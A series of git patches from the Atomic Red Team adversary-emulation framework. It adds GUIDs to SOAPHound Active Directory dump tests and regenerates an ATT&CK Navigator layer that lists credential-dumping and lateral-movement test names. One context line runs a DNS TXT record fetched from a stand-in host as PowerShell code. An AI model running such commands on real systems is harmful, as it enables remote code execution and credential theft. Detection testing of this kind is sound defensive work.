z^ky?T!wkl%YEe{vjEvHA){v)Btew;lx?Rd)P7(=v=zM1-`y2BpHzrczf9bw;wbMIe zo$_(?ijSlJeH?A$<5(qp9GqxfkPgq30yj?(!)~4uh26VjZarBF;?p1H@zdv7f7nfb zlriETcGDl_j`)Y&^haGH{&6>U*Aaj8MZ`^AcTUQswg})55!(cj0wNT0pm-S6DiTIC zpQ1^@6+GxnHCmfDzx%6n_2?ozFlFuCW zb@ZWaVsacgmrTrOU&lB+Ywna}Rgx$tCy29nxPN_#2!IGZrm} zX_v~?)j##b6Ec)=R5wBWOhWF69}N?->A~rA)Q``BP*+(2=MU`23{HEa;es>*Nt0`h zfsI`>WO9nJSdeRY>c$jeGT&CVbQLq5yZf>|k4>!SWuvltN@#&Klq%WQa*KN1DDt5e zo;?IT$LfR9ew13xC0XRceFrVDC{5e*M{rqPNmZJr)df!qd9Ka#Tw3p&)hheb-r3y5 z-Gru7M_SyAvgf$#&^ z+{KNdwn=xtVO?=qF#1`NkXGUHuus%N#>{p03vO+UNQpVZInsC@!?EO^Yf;TZV137O zhU*@h5tsK%p9L+YBZD!_rlnFemxNOcwdR^3j3ezQjHYXNtC4m9EN6!pu=@(z2(eA0 z)`LiAbF?QDLR{s>8+9%T{+l^Js1fAsNepob$3b{M$(e<`GfcUJxf|DW==nTP{5b}x z9aSv^C2x)-t(Wfi&7SBe8$<}+2%$EX<>}Biw?${Un{7#!!ijalsRm~tOQ(Am>I7LY z?V;#?C)iioIegnV!ZrLIBW**eztD3=@-aOp>sb1Io#HF+?-=incuPBO!IDScSctZA zG{w+3zwO+-K}Wux(*^Uvw!}X2Uh3SKzk9Zayo#?Z&=RUc|82~IpYYCfR;;NffSc`H zTT~Ow6_E3k&*d=x#6G-6*IjZY=EFFu`^d{KSjOmW$$R;r9$Gu{Zdc;S=-kbhB62p} zfER|t1Zmke+3MnOl_;VPHPk^%8J?|}LEBtN>gcJfqvkuTZDWeMzhmgb(mJH^5vip) zn;D9hF}fNtu3jHx-v#40fj`_7ouA1i?a<5XxaPMYYqZdZbz_dQOm5X}*J|-*_;Iwh z*4lC0?J@qcUCuZtFVWtN^Ujp`iUluo-U!R0?Wh@7d$uHRLG|G*WDcB%F*u_7@XNJn zJNR!CP`T9&z;-~M-HvoP@;KhPS8ssAQ=%4jHtfZ4dzsm#^CfR7Aca7W(g!zrj>~mF zu$}l@x?RkA_iD|JkX_|&)%Ng{QS2ctE2Rdu2stzPC(BRE0JV|k-pl>tj!ge8jk!?n z*KDPRiI&ZjpWV}S%0t~4D~YADIraZd>ukpi<@%C`j7E*6-YqltE#0Q)JJvXd-D6$4 zicv1)zMPsQjul$>nT4h6dSN4wz1W`Tc4%p$bmS}6ob6#_JyH0-Upn*XSiE>@rV=fR z-fB+1SgXUviRO9`6I>OIr_SY8muoUuU7mRNJP<)S)m%;#3H3@V1!@ZPbaTT-CZbnm z1JS(*It78i4A{jO##9}b1%WJr3!SDx5tOB2nba)8i4_ZA0yGh2PF$#nGaMhW;wGbl zn7sT%aW#0Q4*vdw_b0lb7pobDVS82BW(~^B|MuRHX$3!zqmaAB=1=L7I9JMeG-NhY= zmu>0r=cxHm*v5xp$=_)st*y%43>TebI(yRY$L8au`mag%9HlqriO>A}!dp&nAA0@Z zw|{u`J$qhhxp!>Z#_k>O82jdXfAO7v zm&Q~6-tx70H!jtcGRAnzJ#Tq8oNK#!Qz_CtA|8-#BHiih%-TZAcxG~KxBCpq5Wmb< z#Wyv2TeaT#W~q0k*68Jzczf}2jw-$~hYyYP_2RQFbNSYdz53aqdl9bDi*WqC-F}Mb zjurNsC2N0pTP%-j+!u6~$YU}T|HfGSD|7Wyp**u_vzH>4@X6m2J_*9F9fhLa6pMP5 zex`<%;n#%m&3cxhpj87Jj*I5;j-^aG+&nw@rH@|u(noJ0UpP_f#m5(WtF=}yzQ2H` zn(LjJZ?sMz*}Q%%cXI7A`C?8NKQ|ww?wO%j%2)D(qP_fJQ?s`=(_7(phHVxzt(PB;D&xB? zODDA_mejK(se^}?jYW3p#MEY64-Z?bsjlB$w z!H7>$R?s!_9n{{Md>gVCpUG;JOZehcZ>`$fTB!9FOZC=?UipAav-dbY8dIcC5ucf< z0&O);l$s}Mm14M`FbcZQo=t&st!$lWsDGqfQ}F^}+#@+#5-76BMfbgzNL8MH2$k0 zgZv|sa34N7DO8!Om>;2$eU7BBkJWsge$E6FWL8QSE=GF!hV}UC0ViDBWytdkSRD`m zvtj)*Uv zdNy2}+GvmlA}y!iCI(5Zy<(MtpTu9=y~5jY_NUgL{Up-y5DJO@)Y@e$QlP*AxOVvp zZ!P^-c-?E4_X4cnim+?DF#(Vp%C(l{)Y|pi(%oh){<^!mQFI{Q^HyAQ>H3Q=UA2Da zre(`7UE95!|M9n*{}Cm=eABWGdyvkh-QA`uwP{)RrQIyYE$jPH=qoPWa0}S~D*6+w zx^#JOI)&KFdQEx(jWUJ73{5t@PCsY|Tfp8b*)HkI7Ms`h3MY! z&=UJ|+adTXQ&$>x)7q|8sSVvL)VKT6i&7p? z^>jZkMbKwS07lqw_H~<*Ls?&x1jXxKfgGUm-*rfdm(U__Y_MmLZ;`$%^Qz8(y?_!ye~_h?peZOyaRK8y>4KH)-Uj z6YC01^070_extFj`l^dCS=r`Snq}xicoWu9jkQ;-#yHqx3v%&_W#L?8(tTnj=Iw^F zpThsQtyqKdZ#erI)D}OVlOL%8Vtt7-4fOSAze@W0v)_n#)5W2~xb}DLYSeqf*)Mn- z&BhdIUqBM1F)^iSvd_XG!dPSRuQcgZDYQ5Ej9K2B+Q>?x*|o_b8Hg{5tVglq|`lyrz{zP9=Uw zv@AKIZAPRc0s3G>%5hOO)`_QkMUnZqAtxfNu?a+@_k`E#_G#UIOt&A`?I(2mySn|PZa)p^UHayJV zqfS>u60k@l`8K*iqmV=x0-`pduB{+xsZ%0^{m$qQ`8`VBL!tydT8YHd9wvwFP{La0!Oko5%P&aDWCBCX;2nuuPAAxKhWpnkHfLI{#pyM$u6B12xS3*bIAdZ8Cmp>F+@uK@zW zeT_242uK`e2_3}EO?;0zNIOJJK!@)ej2iG}j;;0KPzS&PAiPCahU;RzDh=+1oruRZ z)(bFNj%q9pTLgLT&(32NZ`c z3;{U}#WW27bb}Vv3wtT~?OP=yfHSbJ)+I4$7;SPPLAK3BIPlQmzKBAY=a|g$!W!jp z0ASQ$1a9T1i+Mq7G$J>=xG5agACT(GP)Zy=!4F!H!BaJe!+0I7xha4|dAUKWX=n^N zNqp&}Yg-)=0&pnQBQwYop~glx&nOx(BBM1BF`_F$3rBj=jaigC z5N3k|+7YU6l$%7)7NciXG$j*!Q;a^VqLuJ+g?M&kM9B_KK_ngI>fDv|#2nbwGXxE- zw*f+MB#M@RX4tOxN9!@?L7T@+vV|gbBj=EulmS5r={^e5QgF5uJPQP%JWK&_n^m{7 zQF6izr?B>GG3#j-*UpKJ{Td(;ygiBD8nd3n%NFt)wsqk&0_QB@Y!275v5D0G1U^;| z_2CudG9BTFFenI_@|mVf>S8meQBLd7>0s~Au;?!B*13kEJ3$ImqGDG$Uz^eupk#{NQf_H<*OZ-ozEFlb@ zCGRuLn}fqQ>grj)dPCz4d{C-e-x|`u9P2kpESeamwFqNsrPzs#0zYGGMs2{~akU-| zY1W?}Fi+*vsa*PazKcFuyP%_lqjui$^{g8eA zJE%H1^;69243dSI_Fi5rUZA|j1sWRU!V9Lbn%2sT!OOk8Sj45?-_dTp@H>Jy>f47u zT@pt~s$AC`E~^ENXKS%miwXmewWvNWKr1R|$lKXk&639&#yRM03fBt%W?zCv$_Z1I zMD-B(JX+z}(n$bZqD@0vDN23HwX7&D2TDg`N?yTp zCf6%7Gj7r6vepU6lk^oTOG}kr?L{KBkDW#pTpx2!jO&N@f~y zAc*_wc)C~X2uu$Mifi!QQ_9M}N9mDQ@UNL1@<&0H$x@+7g|rmSnzVt3_6wt81< zc@*qMe*`H(^AVa8xVHN_(%*X!Y-`ZYvKB%b8Za+mT)Jr9q5Qv(o`{yT# zCs3y3CH(i4zGo}tdO9us698Np0}(*(kzoI2oUSaQ==#gu0<^I_imi(_!o-m}d!$YI z`gN0Xkvy+$;;nR|BiFduOG>VOU0MMtY#JmBk0ErUBV1kQZt6y54Mkwr(~gB@^An<~ zWZtpXZG*%$7wTP~BW*mxA|Wl65EFYd+VFg+VS7{y-Y(i{sl}ylTI$exj#VkK0Jhi- zuC=SO(Nw2omUfo(&Hp-xDnjrOTMNw!UE3WOG200{9WyGMFhzMq0a`Eyz2~~*Y9`*? zp1Xk+xBn|5Qc31?2~XV>PqF!VTtZdKmD&p%>2KL%r}W{!>sd{1RErN)B&fRw(bDMF{}- z-Dp%PT7ISSe3!{TK=O;2!|R2s(I_UUqW39W!{aJvMy?mGsrfGAIQuAEYr%H5;O#;h1x^-EBgE_=UYTEF&0^))T+?&kAy4*~V0Qj?za$i<6hk~qTSRcgEIi zPamoKIT?&p+3h|&5Yie( z%n4-}6N0Ho!vQRQ=Q8mzbK7`6pSi2MI|nn7$#|}7GC7t_%k*w6J=wjrr)NiZZ}$Mq zL{6H6?sEJ-WXHJ!O<7ETcD;e@rY9$I>3F6qojuWgD#!f#x_fqZdkkS%r7Kd4E2Ftk=gnAf?HnbQ8O}dm>F>BTPqK3>Y+^@n$<(I^wbDc zC!k}b?qC*XD40KJz6egTB^_4uJ?W^Y@I_E(;fttsKWy_wgXgIHpwIT?$JvW7f-@Ok z1Qj4?OzTSXeOkzM9Wqnqsr%y4xoBEPNLw3tO-eg&JE0;9ymgza=_Kh6VMbQu7^7)4 zzb?lDi>71~T_Y#Qrt-;&x~)+4Y|}K@f%$vyjj$h(&rXmoc0%Za2XHw%QK7QC$K$CJ z<|vworacfW`wO4MIktEA_IB@0psyzLGyCJI_zCH_;2v48Tvc3wgVX;godh)Typh+k_c{6ZUpLuz%l(@Le?R$RYE%nT7tV)VA0nSlJG# zY=^3BhxPAL-r>~9OfGLuc0Di&G)pcFst`>dHyfn{CAC}MLbYzk?z}U8$Jia)dv|W@ zGkbRItYw~T+}?^+3xz_!j{6noi4cG6+fCBS2F-jt>Ek|K0m3CF^T*W)bIhE?Ff$oX zVbGF$*K{rc2F*qn8KiL`vaXM(W)2_P3xiL8TfEL}$wm5j*+KFY`V^1olZPGZVTUk+ zKDq8dGx3*q{Y+GsENU9}<_?(;PoWhiLRp2gTH?GP zIoK~Ud+2^Qg|yoOd?8S<7?WyR+5_9_KoT|3dfU?C0oxqXJ~KaH!!%!HC2$fMSl9fC zl@+e0Eg)ML(V8|dJ>1f(TWy$*#OyC}8I`NEPEZWb+-QuhPH;YwsQOkHHq0>#5AbpX z{Q^Pu3*6-4h*?`yHu+UCR~CSr z5LjVlq>8$cO zX)5qqDc3_C23-vV}PodIpt6S8xr+ypeXKB?fxV(-Y##r5=d^DV!y;ir-qzADpK|?Q-u5L*_ zHZH9t$m*+G9wp2t=M&~+ESCL7)h&31p*3(xqyZ}%4L;r;kR}O0kue-HbI`w37ZRvN zi!A7tK;c3DP~DQTdK4?1;rb75vi`$Ito-2S>&ro?Tr~Sh$d?WA^0X!A}$|JWlijs<^D}CmV2(Z0P7z@+Rbyr-s=HA znD;!IEFah{L#eTJ0+rd9oJ{%{$#p8Rte=#N@AqZnCn$D1izHP5_vS#B2h#bGsZ1sf zyTODP)z=IBOBHlD?&5$b5z~3-|C5O-RAJTbcnUkH9h-f%ytWw7pI>PEzR@PKT4{o% z{?fcnZY%ZP;z-i8|F zJQZu_9a*iv^2rZ(Tqkx0v520>(CZZ;`fn%?mymG_B~fj1D4 z*DuKR4GOd87fBIyioxP2qVjMlVm-Ie_8n|}3l@zACLqQoW`?GdxxCL9B1rssa^$k% z_!2apHechpFD|Rdu4UFM(uQ7FZRT~=W?pyN%HRus{JQn`zFzmah4mPZ z1x|NyRo_qP-HXV{rT5oA$%eqgP4B$^^1KYSl7wdcWrbw|SMqe^+v-7Zs}c*He7Qu6 z$%UEljGLCVeE4t&n4#%RQn9bm}fyLhy80+$JncqBucPwq*yi zL|^%otU4sR?QkmRc8dz-m5By7M7MuicDl7WEzh;et4=-s+Q)AfBwYI}9=nw_omb2W zQgIHs#LKjqiOXfJ!n~tu^*G!*2chNt0SotYnvzwo{0LcC;^0)?dU>Ams?NdMV1NlF zeKzNnmlxgX!HMTYS=Fns3RNKT6wAt$>5XovNB@nlC)~jJEyjp`spFo&n6rScAi21G z0V^wWn><#pCAMHxr=l<|g)d$PgYt9)Q$QFG`sP13AcGZiaxr54osUdAZv?>;CXA!~ zpapgG3nG-{;{tX}!Bv``UB5+Kr5Re28b8f=c5GZk>Pt$bzNAFzOO8l=$s?6j*ONN=b%rg9xnOXMoi)4a2wl^R%3jXE- zd}(O502`JP0YBCYA6bxfJuT#p9_@R zKl#b>$o~fjMMC}P1}!hEPP&Czjg^SmrrWL7fBA?RUkXeXZAQd^#3vgjm%O|pnNBan z%(dz?sbER>HHGn#$QYDD7bJQ3q_IjO+jauI;ul7d&NaQgA zq#^(E(r476kNazF#jzYNgjB9_zMqt>67!>D_N+GRtX1;$TRl(#Xj@&U43sIef@ z1tD4O7dMv=D}PZA%bFl8%Z8XI%YpffzvGpQfXj!fr^=z*^vTdI7xJ1pz`%4E|2v|z zKnXUnHlO^pY-p1qrd zZYvVhSunQ^N4sYm(C*nrNr>O9+ncOwJ|Vsev((XaCJo0A-W}u8;>)eDy-PsZ#Y^)G zEx0JwfA@N}rBz+LpJ(q%i9~(6-DCaIN1~%kjVb>Gd3>phE0Uvv(#X?rmPUWq8Z4oN z`dzxcqY(0;KD8vcm~)ShpAaXPx9}oap1$6VmR0X5pRfz6M6yBMzIXY0i@PJi%f^$1E0C2fv{EF%a4@}F3Djr!e z%qa$L6;%;Fpq2|g5xSqkPQe=MJLR-9<`ia@4QtllmVY zC?~E@#q3yFRJrUD)+g!iEu|Y&>Grf1)iC>@??GF3budR=9n4YcV2--SL0)r?p1oE) z7V?_xba}p!UJTVyt&SJJ!Zqo#_BxhbV6vF~LOsu$y~;CEc~`fW#dQnMmAn=WX}`sx zYc+Lya|5ZF5YCCz6X|@)%x}r5g9*1xB#(vVaKbLQU2>qZr@v1QKs}!rkFazbU1HTIdsZPVtG`FB`EdJt8()4rHW=bc~uU4Qn-Ox zHvm5@avmw(xg{f5jGQe+&K4ujmLkvUA+2T9oXqg#B7+NRnidOb&4WoetBub%G3_Dk zCaOX76w+FUQru_Hjm5^m30&p4$|jHn z{ywsqbPfe>fbFJAW|{^K;E`Jn0q0Ow2aTwf6oqqElgC+vg4duU3r#B~nr#bdD?Nn< zUY{jQu$4N=@3Aex`TQm{k)i3lnS%FNi9Vdev5yKgaul3dkTaCw9$ZdmGTAhC@u|8O zUo*D>7#|{Uyy5{#t_B`?jwDZDyE)EJ${EfF2~8uYvQrlaO&ZuUnoJ{dRY;49btzl} zyKy&%v^D#aspRC;q;Y6uKp@;_rcUI?)lrd;Nb7k-wVp?$Z9dYB^K^F)I245aNrax3 z6@}M^v{hbu7Ew(~_+9`efN?;)0&5yN(t7XfBJ8kX%{m8*R(y}Wq^e?HGLIQ0;=su~ z@J_GZhH{&Y4Zz08zyVDogbpV+*cQ_{=ls5nu&^4U58*Kr8I5IUNyC;@^?@cNl+(>VNneqT`;^h_D`$ zgkr{uw{p_D{hFFV*ssZ>by_`IrSw})~_H&wX)?+N^J<0YxRsMUD z_C3a5miWsm{<6ehX1p9WZL5=~@j!<3eocKlQOEPQ;fV_;Roe}1I2ql388vv7e-ZrY z_62TAv|m=Bzbg4(2x}{Fj(Y5Nd4kI>utiB3uEE*h^zq6g!f~e~-U!b2#`}x-AH%8R zOo;Fsy8RXclJ~0s7hxISn9BY+#|A{S@Eq=o3Pk!#L$-K^r#!f!LO|u!QOCo>0dZYN z9g;|B4UR~+Uv)loZm7vhI8?LYcF; zxO^EYBdu_P%)!e3Ai7=a((Z8ndbCCc@5En^20Mp{*g2pVa`ak5OM?UH6m9pVm5+{R z)2DJFW)!o3gF&vLXb6hKf@zo`{b_ePGm}k1>0tcpbB3|CXDd$Ny&cBA+qT_tXYa9| zom=|Moqb#Swv8Rz5-NN*+jp9G_Vj8R*+#EAEmqU^qQiF`7#hVv4wL4o zboQamj+E7Zvaf3g&oyl;zH){Pau}W87{xaR(n`g&f2^DQ9z(R}7{cGr-il~H`?0Du z&-JmcyYD(8Cl4PfBH;*Js~67 z-+oFn?v>E*FTaZzsF5~hz<_8iz#GQh4<);srlE|I-dkjnqG7!EDX}gi%q`0k7URPAkot}5}Op<~}lmocaO^f^6r8Odz zTizhvc>S4_;2Z&t=-X-!N}`vP1Tp~A^n822IBKD97PoG_!dS^%`3D}L!NsRwN4fK& zyO{|OMCE04AA3 z7P)xyQIw%y8s#(QA=Kaf4GO#moigZJh$XwYa-HR9pj;3)CAj+pzr)Cb4w0tdD<%>K?9GuL^~-7SqRjl1Hx z91e}0m@$w=D%amRl}+81Q(i8%6s<(Jz{|y5@!VwB$=*%_=Y}VbLvVD5HYpF88AdTP z_cVAPOdKRTjTFYa{?7d~m=wT!p-gF+!qpU9a`r6iN?3edQqcl%)9g@ZL5Bp|`AZkIxLyRCc)?l>%=8QEsGFG1eF K&+>O31OEr4bf?q+ literal 0 HcmV?d00001 From ed31f26ba948b1d3ee5dcdc6b1ea9a87c67f7bf2 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Thu, 22 Feb 2024 17:37:00 +0000 Subject: [PATCH 04/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1059.001/T1059.001.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index a91f37080e..9ce5f76470 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -406,6 +406,7 @@ atomic_tests: powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell - name: SOAPHound - Dump BloodHound Data + auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f description: | Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound @@ -445,6 +446,7 @@ atomic_tests: #{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory} name: powershell - name: SOAPHound - Build Cache + auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948 description: | Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 216d02fe27..df2704ee2d 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1559,3 +1559,5 @@ a4420f93-5386-4290-b780-f4f66abc7070 0128e48e-8c1a-433a-a11a-a5304734f1e1 eea0a6c2-84e9-4e8c-a242-ac585d28d0d1 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50 +6a5b2a50-d037-4879-bf01-43d4d6cbf73f +4099086c-1470-4223-8085-8186e1ed5948 From 77a44aea50ddfd9bbb37932a17321f6ec7fdb1a4 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Thu, 22 Feb 2024 17:37:16 +0000 Subject: [PATCH 05/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 77 +++++++++++++++++ atomics/Indexes/windows-index.yaml | 77 +++++++++++++++++ atomics/T1059.001/T1059.001.md | 83 +++++++++++++++++++ 9 files changed, 247 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 2fbf9f9c01..4a2df1ccf1 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- 